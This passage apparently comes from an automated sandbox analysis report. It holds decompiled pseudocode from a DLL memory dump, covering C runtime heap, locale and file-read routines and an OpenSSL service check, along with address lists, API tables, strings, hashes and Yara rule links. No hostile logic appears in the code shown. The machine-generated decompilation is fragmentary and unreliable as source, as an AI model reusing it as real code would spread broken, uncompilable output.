																			_v716 = (_t398 - _t436 >> 1) + 1;
																			_t299 = E6E541BBD(4 + ((_t398 - _t436 >> 1) + 1) * 2);
																			_v732 = _t299;
																			__eflags = _t299;
																			if(_t299 == 0) {
																				goto L124;
																			} else {
																				_v728 =  *((intOrPtr*)(_t465 + _t444));
																				_v748 =  *(_t444 + 0xa0 + _t377 * 4);
																				_v752 =  *(_t444 + 8);
																				_t405 =  &_v280;
																				_v736 = _t299 + 4;
																				_t301 = E6E546B92(_t299 + 4, _v716, _t405);
																				_t483 = _t482 + 0xc;
																				__eflags = _t301;
																				if(_t301 != 0) {
																					_t302 = _v712;
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					E6E53498C();
																					asm("int3");
																					_push(_t473);
																					_push(_t405);
																					_v1336 = _v1336 & 0x00000000;
																					_t305 = E6E544B0D(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t305;
																					if(_t305 == 0) {
																						L134:
																						return 0xfde9;
																					}
																					_t307 = _v20;
																					__eflags = _t307;
																					if(_t307 == 0) {
																						goto L134;
																					}
																					return _t307;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t465 + _t444)) = _v736;
																					if(_v280 != 0x43) {
																						L102:
																						_t310 = E6E542F64(_t377, _t444,  &_v708);
																						_t437 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t437 = _v712;
																							_t310 = _t437;
																						}
																					}
																					 *(_t444 + 0xa0 + _t377 * 4) = _t310;
																					__eflags = _t377 - 2;
																					if(_t377 != 2) {
																						__eflags = _t377 - 1;
																						if(_t377 != 1) {
																							__eflags = _t377 - 5;
																							if(_t377 == 5) {
																								 *((intOrPtr*)(_t444 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t444 + 0x10)) = _v724;
																						}
																					} else {
																						_t469 = _v740;
																						 *(_t444 + 8) = _v724;
																						_v716 = _t469[8];
																						_t417 = _t469[9];
																						_v724 = _t417;
																						while(1) {
																							__eflags =  *(_t444 + 8) -  *(_t469 + _t437 * 8);
																							if( *(_t444 + 8) ==  *(_t469 + _t437 * 8)) {
																								break;
																							}
																							_t339 =  *(_t469 + _t437 * 8);
																							_t417 =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _v724;
																							_t437 = _t437 + 1;
																							_t377 = _v744;
																							_v716 = _t339;
																							_v724 = _t417;
																							__eflags = _t437 - 5;
																							if(_t437 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t437 - 5;
																							if(__eflags == 0) {
																								_t331 = E6E54685C(_t377, _t437, _t444, __eflags, _v712, 1, 0x6e626a98, 0x7f,  &_v536,  *(_t444 + 8), 1);
																								_t483 = _t483 + 0x1c;
																								__eflags = _t331;
																								if(_t331 == 0) {
																									_t418 = _v712;
																								} else {
																									_t333 = _v712;
																									do {
																										 *(_t473 + _t333 * 2 - 0x20c) =  *(_t473 + _t333 * 2 - 0x20c) & 0x000001ff;
																										_t333 = _t333 + 1;
																										__eflags = _t333 - 0x7f;
																									} while (_t333 < 0x7f);
																									_t335 = E6E53139D( &_v536,  *0x6e688edc, 0xfe);
																									_t483 = _t483 + 0xc;
																									__eflags = _t335;
																									_t418 = 0 | _t335 == 0x00000000;
																								}
																								_t469[1] = _t418;
																								 *_t469 =  *(_t444 + 8);
																							}
																							 *(_t444 + 0x18) = _t469[1];
																							goto L122;
																						}
																						__eflags = _t437;
																						if(_t437 != 0) {
																							 *_t469 =  *(_t469 + _t437 * 8);
																							_t469[1] =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _t417;
																						}
																						goto L110;
																					}
																					L122:
																					_t311 = _t377 * 0xc;
																					_t204 = _t311 + 0x6e626b20; // 0x6e4f8da0
																					 *0x6e61623c(_t444);
																					_t313 =  *((intOrPtr*)( *_t204))();
																					_t409 = _v728;
																					__eflags = _t313;
																					if(_t313 == 0) {
																						__eflags = _t409 - 0x6e688fa0;
																						if(_t409 != 0x6e688fa0) {
																							_t468 = _t377 + _t377;
																							__eflags = _t468;
																							asm("lock xadd [eax], ecx");
																							if(_t468 != 0) {
																								goto L129;
																							} else {
																								E6E541B83( *((intOrPtr*)(_t444 + 0x28 + _t468 * 8)));
																								E6E541B83( *((intOrPtr*)(_t444 + 0x24 + _t468 * 8)));
																								E6E541B83( *(_t444 + 0xa0 + _t377 * 4));
																								_t412 = _v712;
																								 *(_v720 + _t444) = _t412;
																								 *(_t444 + 0xa0 + _t377 * 4) = _t412;
																							}
																						}
																						_t410 = _v732;
																						 *_t410 = 1;
																						 *((intOrPtr*)(_t444 + 0x28 + (_t377 + _t377) * 8)) = _t410;
																					} else {
																						 *((intOrPtr*)(_v720 + _t444)) = _t409;
																						E6E541B83( *(_t444 + 0xa0 + _t377 * 4));
																						 *(_t444 + 0xa0 + _t377 * 4) = _v748;
																						E6E541B83(_v732);
																						 *(_t444 + 8) = _v752;
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		} else {
																			L125:
																			_pop(_t461);
																			__eflags = _v16 ^ _t473;
																			return E6E52F227(_v16 ^ _t473, _t461);
																		}
																		goto L136;
																	}
																	asm("sbb eax, eax");
																	_t295 = _t294 | 0x00000001;
																	__eflags = _t295;
																	goto L93;
																}
															} else {
																_t341 = _t459 + _t459;
																__eflags = _t341 - 0x106;
																if(_t341 >= 0x106) {
																	E6E52F8BD();
																	goto L83;
																} else {
																	 *((short*)(_t472 + _t341 - 0x10c)) = 0;
																	_t343 =  &_v276;
																	_push(_t343);
																	_push(_v456);
																	_push(_t440);
																	L84();
																	_t394 = _v452;
																	_t478 = _t480 + 0xc;
																	__eflags = _t343;
																	if(_t343 != 0) {
																		_t394 = _t394 + 1;
																		_v452 = _t394;
																	}
																	L55:
																	_t456 = _t372 + _t459 * 2;
																	_t279 =  *_t456 & 0x0000ffff;
																	_t431 = _t279;
																	__eflags = _t279;
																	if(_t279 != 0) {
																		_t456 = _t456 + 2;
																		__eflags = _t456;
																		_t431 =  *_t456 & 0x0000ffff;
																	}
																	__eflags = _t431;
																	if(_t431 != 0) {
																		continue;
																	} else {
																		__eflags = _t394;
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																			break;
																		}
																		goto L81;
																	}
																}
															}
														}
													} else {
														_t344 = 0x3b;
														__eflags =  *_t372 - _t344;
														if( *_t372 != _t344) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L136;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t456;
						if(_t456 != 0) {
							_push(_t456);
							_push(_t259);
							_push(_t440);
							L84();
						}
						L81:
						_pop(_t457);
						__eflags = _v12 ^ _t472;
						return E6E52F227(_v12 ^ _t472, _t457);
					}
				}
				L136:
			}

0x6e54366f
0x6e543677
0x6e543678
0x6e543681
0x6e543689
0x6e54368b
0x6e54368d
0x6e543690
0x6e5437ad
0x6e5437b0
0x6e543696
0x6e543696
0x6e543697
0x6e543699
0x6e54369c
0x6e54369f
0x6e5436a2
0x6e5436a5
0x6e5436a7
0x6e5436aa
0x6e5436af
0x6e5436bd
0x6e5436c7
0x6e5436ca
0x6e5436cd
0x6e5436cd
0x6e5436d8
0x6e5436dd
0x6e5436e2
0x00000000
0x6e5436e8
0x6e5436eb
0x6e5436eb
0x6e5436ee
0x6e5436f0
0x6e5436f3
0x6e5436f5
0x6e5436f5
0x6e5436f5
0x6e5436f8
0x6e5436f8
0x6e5436f8
0x6e5436fe
0x00000000
0x00000000
0x6e543703
0x6e54371a
0x6e54371a
0x6e543705
0x6e543705
0x6e54370d
0x00000000
0x6e54370f
0x6e54370f
0x6e543712
0x6e543718
0x00000000
0x00000000
0x00000000
0x00000000
0x6e543718
0x6e54370d
0x6e543723
0x6e543723
0x6e543728
0x6e54372d
0x6e543731
0x6e54373d
0x6e543740
0x6e543743
0x6e54374d
0x6e543755
0x6e54375d
0x00000000
0x6e543763
0x6e543767
0x6e5437b2
0x6e5437bb
0x6e5437be
0x6e5437c0
0x6e5437c4
0x6e5437c8
0x6e5437cd
0x6e5437d2
0x6e5437c8
0x6e5437d6
0x6e5437d8
0x6e5437da
0x6e5437de
0x6e5437df
0x6e5437e4
0x6e5437e9
0x6e5437df
0x6e5437ec
0x6e5437ef
0x6e5437f2
0x6e5437f5
0x6e5437f8
0x6e543769
0x6e54376c
0x6e54376f
0x6e543771
0x6e543775
0x6e543779
0x6e54377e
0x6e543783
0x6e543779
0x6e543789
0x6e54378b
0x6e543790
0x6e543795
0x6e54379a
0x6e543790
0x6e54379b
0x6e54379f
0x6e5437a2
0x6e5437a6
0x6e5437a9
0x6e5437a9
0x00000000
0x6e5437ac
0x00000000
0x6e54375d
0x6e54371e
0x6e543720
0x6e543720
0x00000000
0x6e543720
0x6e5437ff
0x6e543800
0x6e543801
0x6e543802
0x6e543803
0x6e543804
0x6e543809
0x6e54380d
0x6e54380f
0x6e543815
0x6e54381c
0x6e54381f
0x6e543822
0x6e543823
0x6e543824
0x6e543824
0x6e543827
0x6e543828
0x6e54382b
0x6e543831
0x6e543833
0x6e543858
0x6e543862
0x6e543868
0x6e54386a
0x6e543870
0x6e543872
0x6e543ad2
0x6e543ad3
0x00000000
0x6e543878
0x6e543878
0x6e54387c
0x6e5439ea
0x6e543a07
0x6e543a0c
0x6e543a0f
0x6e543a11
0x6e543a17
0x6e543a19
0x6e543a1c
0x6e543a1e
0x6e543a24
0x6e543a24
0x6e543a26
0x6e543aad
0x6e543aad
0x6e543a2c
0x6e543a2c
0x6e543a2e
0x6e543a34
0x6e543a37
0x6e543a3a
0x6e543a40
0x00000000
0x00000000
0x6e543a42
0x6e543a46
0x6e543a6f
0x6e543a71
0x6e543a48
0x6e543a48
0x6e543a4c
0x6e543a50
0x6e543a57
0x6e543a5d
0x00000000
0x6e543a5f
0x6e543a5f
0x6e543a62
0x6e543a65
0x6e543a6d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e543a6d
0x6e543a5d
0x6e543a7c
0x6e543a7c
0x6e543a7e
0x6e543aac
0x6e543aac
0x00000000
0x6e543a80
0x6e543a80
0x6e543a86
0x6e543a87
0x6e543a88
0x6e543a89
0x6e543a8e
0x6e543a94
0x6e543a97
0x6e543a99
0x6e543aa2
0x6e543aa4
0x6e543a9b
0x6e543a9b
0x00000000
0x6e543a9c
0x6e543a99
0x00000000
0x6e543a7e
0x6e543a75
0x6e543a77
0x6e543a7a
0x00000000
0x6e543a7a
0x6e543ab3
0x6e543ab3
0x6e543ab4
0x6e543ab7
0x6e543abd
0x6e543abd
0x6e543ac6
0x6e543ac8
0x00000000
0x6e543aca
0x6e543aca
0x6e543acc
0x00000000
0x6e543ace
0x6e543ace
0x6e543acc
0x6e543ac8
0x00000000
0x6e543882
0x6e543882
0x6e543887
0x00000000
0x6e54388d
0x6e54388d
0x6e543892
0x00000000
0x6e543898
0x6e543898
0x6e54389e
0x6e5438a3
0x6e5438a5
0x6e5438ac
0x6e5438ad
0x6e5438af
0x00000000
0x00000000
0x6e5438b5
0x6e5438b5
0x6e5438b9
0x6e5438bf
0x00000000
0x6e5438c5
0x6e5438c7
0x6e5438c8
0x6e5438cb
0x00000000
0x6e5438d1
0x6e5438d1
0x6e5438d7
0x6e5438dc
0x6e5438e6
0x6e5438ea
0x6e5438ef
0x6e5438f2
0x6e5438f4
0x00000000
0x6e5438f6
0x6e5438f6
0x6e5438f8
0x6e5438fb
0x6e5438fb
0x6e5438fe
0x6e543901
0x6e543901
0x6e54390c
0x6e54390e
0x6e543910
0x00000000
0x00000000
0x6e543910
0x00000000
0x6e543912
0x6e543912
0x6e543918
0x6e54391b
0x6e54391b
0x6e543929
0x6e543932
0x6e543937
0x6e54393d
0x6e543940
0x6e543941
0x6e543943
0x6e543951
0x6e543951
0x6e543958
0x6e5439b9
0x00000000
0x6e54395a
0x6e54395a
0x6e543968
0x6e54396d
0x6e543970
0x6e543972
0x6e543aed
0x6e543aef
0x6e543af0
0x6e543af1
0x6e543af2
0x6e543af3
0x6e543af4
0x6e543af9
0x6e543afc
0x6e543afd
0x6e543b05
0x6e543b0c
0x6e543b0f
0x6e543b10
0x6e543b13
0x6e543b17
0x6e543b18
0x6e543b1b
0x6e543b2b
0x6e543b4e
0x6e543b53
0x6e543b56
0x6e543b58
0x6e543e0e
0x6e543e0e
0x00000000
0x6e543b5e
0x6e543b5e
0x6e543b61
0x6e543b61
0x6e543b64
0x6e543b6a
0x6e543b73
0x6e543b75
0x6e543b78
0x6e543b7f
0x6e543b82
0x6e543b88
0x00000000
0x00000000
0x6e543b8a
0x6e543b8e
0x6e543bb7
0x6e543bb7
0x6e543b90
0x6e543b90
0x6e543b94
0x6e543b98
0x6e543b9f
0x6e543ba5
0x00000000
0x6e543ba7
0x6e543ba7
0x6e543baa
0x6e543bad
0x6e543bb5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e543bb5
0x6e543ba5
0x6e543bc4
0x6e543bc4
0x6e543bc6
0x6e543bcf
0x6e543bd5
0x6e543bd8
0x6e543bd8
0x6e543bdb
0x6e543bde
0x6e543bde
0x6e543bee
0x6e543bfc
0x6e543c01
0x6e543c08
0x6e543c0a
0x00000000
0x6e543c10
0x6e543c16
0x6e543c23
0x6e543c2c
0x6e543c32
0x6e543c3f
0x6e543c46
0x6e543c4b
0x6e543c4e
0x6e543c50
0x6e543e8e
0x6e543e94
0x6e543e95
0x6e543e96
0x6e543e97
0x6e543e98
0x6e543e99
0x6e543e9e
0x6e543ea1
0x6e543ea4
0x6e543ea5
0x6e543eb7
0x6e543ebc
0x6e543ebe
0x6e543ec7
0x00000000
0x6e543ec7
0x6e543ec0
0x6e543ec3
0x6e543ec5
0x00000000
0x00000000
0x6e543ecd
0x6e543c56
0x6e543c56
0x6e543c64
0x6e543c67
0x6e543c7d
0x6e543c84
0x6e543c89
0x6e543c69
0x6e543c69
0x6e543c71
0x00000000
0x6e543c73
0x6e543c73
0x6e543c79
0x6e543c79
0x6e543c71
0x6e543c90
0x6e543c97
0x6e543c9a
0x6e543d98
0x6e543d9b
0x6e543da8
0x6e543dab
0x6e543db3
0x6e543db3
0x6e543d9d
0x6e543da3
0x6e543da3
0x6e543ca0
0x6e543ca0
0x6e543cac
0x6e543cb2
0x6e543cb8
0x6e543cbb
0x6e543cc1
0x6e543cc4
0x6e543cc7
0x00000000
0x00000000
0x6e543cc9
0x6e543cd2
0x6e543cd6
0x6e543cdf
0x6e543ce3
0x6e543ce4
0x6e543cea
0x6e543cf0
0x6e543cf6
0x6e543cf9
0x00000000
0x00000000
0x6e543cfb
0x6e543d1a
0x6e543d1a
0x6e543d1d
0x6e543d3a
0x6e543d3f
0x6e543d42
0x6e543d44
0x6e543d82
0x6e543d46
0x6e543d46
0x6e543d4c
0x6e543d51
0x6e543d59
0x6e543d5a
0x6e543d5a
0x6e543d71
0x6e543d78
0x6e543d7b
0x6e543d7d
0x6e543d7d
0x6e543d88
0x6e543d8e
0x6e543d8e
0x6e543d93
0x00000000
0x6e543d93
0x6e543cfd
0x6e543cff
0x6e543d04
0x6e543d0a
0x6e543d13
0x6e543d16
0x6e543d16
0x00000000
0x6e543cff
0x6e543db6
0x6e543db6
0x6e543dba
0x6e543dc2
0x6e543dc8
0x6e543dcb
0x6e543dd1
0x6e543dd3
0x6e543e1f
0x6e543e25
0x6e543e2c
0x6e543e2c
0x6e543e32
0x6e543e36
0x00000000
0x6e543e38
0x6e543e3c
0x6e543e45
0x6e543e51
0x6e543e5f
0x6e543e65
0x6e543e68
0x6e543e68
0x6e543e36
0x6e543e77
0x6e543e7f
0x6e543e88
0x6e543dd5
0x6e543ddb
0x6e543de5
0x6e543df7
0x6e543dfe
0x6e543e0b
0x00000000
0x6e543e0b
0x00000000
0x6e543dd3
0x6e543c50
0x6e543bc8
0x6e543e10
0x6e543e14
0x6e543e15
0x6e543e1e
0x6e543e1e
0x00000000
0x6e543bc6
0x6e543bbf
0x6e543bc1
0x6e543bc1
0x00000000
0x6e543bc1
0x6e543978
0x6e543978
0x6e54397b
0x6e543980
0x6e543ae8
0x00000000
0x6e543986
0x6e543988
0x6e543990
0x6e543996
0x6e543997
0x6e54399d
0x6e54399e
0x6e5439a3
0x6e5439a9
0x6e5439ac
0x6e5439ae
0x6e5439b0
0x6e5439b1
0x6e5439b1
0x6e5439bf
0x6e5439bf
0x6e5439c2
0x6e5439c5
0x6e5439c7
0x6e5439ca
0x6e5439cc
0x6e5439cc
0x6e5439cf
0x6e5439cf
0x6e5439d2
0x6e5439d5
0x00000000
0x6e5439db
0x6e5439db
0x6e5439dd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e5439dd
0x6e5439d5
0x6e543980
0x6e543972
0x6e543945
0x6e543947
0x6e543948
0x6e54394b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54394b
0x6e543943
0x6e5438cb
0x00000000
0x6e5438bf
0x00000000
0x6e5439e3
0x6e543892
0x6e543887
0x6e54387c
0x6e543835
0x6e543835
0x6e543837
0x6e543839
0x6e54383a
0x6e54383b
0x6e54383c
0x6e543841
0x6e543ad9
0x6e543add
0x6e543ade
0x6e543ae7
0x6e543ae7
0x6e543833
0x00000000

APIs

Part of subcall function 6E541BBD: HeapAlloc.KERNEL32(00000000,6E53413C,?,?,6E541790,6E684800,00000018,00000003), ref: 6E541BEF

_free.LIBCMT ref: 6E54377E
_free.LIBCMT ref: 6E543795
_free.LIBCMT ref: 6E5437B2
_free.LIBCMT ref: 6E5437CD
_free.LIBCMT ref: 6E5437E4

Strings

$kbn, xrefs: 6E5436C2
-Tn, xrefs: 6E543824, 6E543678, 6E543839
Tkbn, xrefs: 6E543758

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocHeap
String ID: $kbn$Tkbn$-Tn
API String ID: 1835388192-2187138099
Opcode ID: 9641427d47331d60a453b38ac5ddf0e7e838472f0c159bebee23bd8668d26ce6
Instruction ID: 0eb9b006d3cf9ec4cbafac46aa64ed275034e5c9e6f752137690a173d16e9b78
Opcode Fuzzy Hash: 9641427d47331d60a453b38ac5ddf0e7e838472f0c159bebee23bd8668d26ce6
Instruction Fuzzy Hash: F0510572A00705EFDB50CFA9CC40AAAB7F9EF48724F100A69E555D7260E731EB01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E5811B0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E5811B0(void* __edi) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __esi;
				signed int _t20;
				WCHAR* _t22;
				void* _t28;
				unsigned int _t31;
				struct HINSTANCE__* _t39;
				void* _t43;
				void* _t50;
				void* _t55;
				long _t56;
				long _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				void* _t62;

				E6E52F9A0();
				_t20 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t20 ^ _t61;
				_t22 =  *0x6e68e344;
				if(_t22 != 0) {
					L4:
					if(_t22 == 0xffffffff) {
						goto L7;
					} else {
						 *_t22();
						_pop(_t60);
						return E6E52F227(_v8 ^ _t61, _t60);
					}
				} else {
					_t39 = GetModuleHandleW(_t22);
					if(_t39 == 0) {
						L6:
						 *0x6e68e344 = 0xffffffff;
						L7:
						_t50 = GetProcessWindowStation();
						if(_t50 == 0 || GetUserObjectInformationW(_t50, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L13:
							_pop(_t55);
							return E6E52F227(_v8 ^ _t61, _t55);
						} else {
							_t56 = _v12;
							if(_t56 > 0x200) {
								goto L13;
							} else {
								_t58 = _t56 + 0x00000001 & 0xfffffffe;
								E6E530020(_t58);
								_t28 = _t62;
								_v16 = _t28;
								if(GetUserObjectInformationW(_t50, 2, _t28, _t58,  &_v12) == 0) {
									goto L13;
								} else {
									_t43 = _v16;
									_t31 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t31;
									_push(L"Service-0x");
									 *((short*)(_t43 + (_t31 >> 1) * 2)) = 0;
									E6E61214E(_t43);
									asm("sbb eax, eax");
									_t59 = _t43;
									return E6E52F227(_v8 ^ _t61, _t59);
								}
							}
						}
					} else {
						_t22 = GetProcAddress(_t39, "_OPENSSL_isservice");
						if(_t22 == 0) {
							goto L6;
						} else {
							 *0x6e68e344 = _t22;
							goto L4;
						}
					}
				}
			}

0x6e5811b8
0x6e5811bd
0x6e5811c4
0x6e5811c7
0x6e5811d0
0x6e5811f2
0x6e5811f5
0x00000000
0x6e5811f7
0x6e5811f7
0x6e5811fd
0x6e58120b
0x6e58120b
0x6e5811d2
0x6e5811d3
0x6e5811db
0x6e58120c
0x6e58120c
0x6e581216
0x6e58121c
0x6e581220
0x6e5812b4
0x6e5812bb
0x6e5812c9
0x6e581246
0x6e581246
0x6e58124f
0x00000000
0x6e581251
0x6e581252
0x6e58125b
0x6e581260
0x6e58126b
0x6e581276
0x00000000
0x6e581278
0x6e58127d
0x6e581281
0x6e581284
0x6e581289
0x6e58128f
0x6e581293
0x6e58129d
0x6e5812a5
0x6e5812b3
0x6e5812b3
0x6e581276
0x6e58124f
0x6e5811dd
0x6e5811e3
0x6e5811eb
0x00000000
0x6e5811ed
0x6e5811ed
0x00000000
0x6e5811ed
0x6e5811eb
0x6e5811db

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,6E5814D3,?,?,?,?,?,?,?), ref: 6E5811D3
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 6E5811E3
GetProcessWindowStation.USER32(?,?,?,6E5814D3,?,?,?,?,?,?,?), ref: 6E581216
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,6E5814D3,?,?,?,?,?,?,?), ref: 6E581231
GetLastError.KERNEL32(?,6E5814D3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E58123B
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,6E5814D3,?,?,?,?,?,?,?), ref: 6E58126E

Strings

_OPENSSL_isservice, xrefs: 6E5811DD
Service-0x, xrefs: 6E581289

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
String ID: Service-0x$_OPENSSL_isservice
API String ID: 1944374717-1672312481
Opcode ID: 26163f3da60f7b5da3adecf105b41573a1f2bd19ada9326afcaa7d476b90e840
Instruction ID: f31c6a77d97587496050d280ec07c0b16a75065858b670efcc65a9fd2d21d7a4
Opcode Fuzzy Hash: 26163f3da60f7b5da3adecf105b41573a1f2bd19ada9326afcaa7d476b90e840
Instruction Fuzzy Hash: 9731C331A50519ABDB14CFFA9D45AEF77B8DF86324F10426AE936E72C0EB3099048761

Uniqueness

Uniqueness Score: -1.00%

Function 6E53FE08, Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E53FE08(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E6E537E5C(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E6E537E6F( *_t137))) = 9;
						L60:
						_t139 = E6E53495F();
						goto L61;
					}
					__eflags = _t198 -  *0x6e68b918; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x6e68b718 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E6E537E5C(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E6E537E6F(__eflags))) = 0x16;
								E6E53495F();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E6E541BBD(_t154);
								E6E541B83(0);
								E6E541B83(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E6E53F7DD(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x6e68b718 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x6e68b718 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x6e68b718 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6e68b718 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x6e68b718 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6e68b718 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x6e68b718 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E6E53F37A(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
